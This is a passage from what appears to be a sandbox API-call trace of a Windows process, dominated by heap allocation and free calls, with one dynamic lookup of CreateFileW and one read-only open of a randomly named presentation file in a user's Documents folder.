RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0083.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0083.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4260 [0083.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0083.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0083.314] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0083.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0083.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0083.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0083.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0083.317] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0083.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37d0 [0083.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43c37d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0083.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0083.318] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0083.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0083.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0083.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0083.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0083.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0083.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0083.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0083.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0083.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0083.320] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\zsm3mofqp.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0083.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0083.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0083.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0083.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0083.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0083.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0083.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0083.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0083.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0083.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0083.323] FreeLibrary (hLibModule=0x772d0000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0083.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0083.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4260 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0083.325] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0083.325] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0083.325] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: 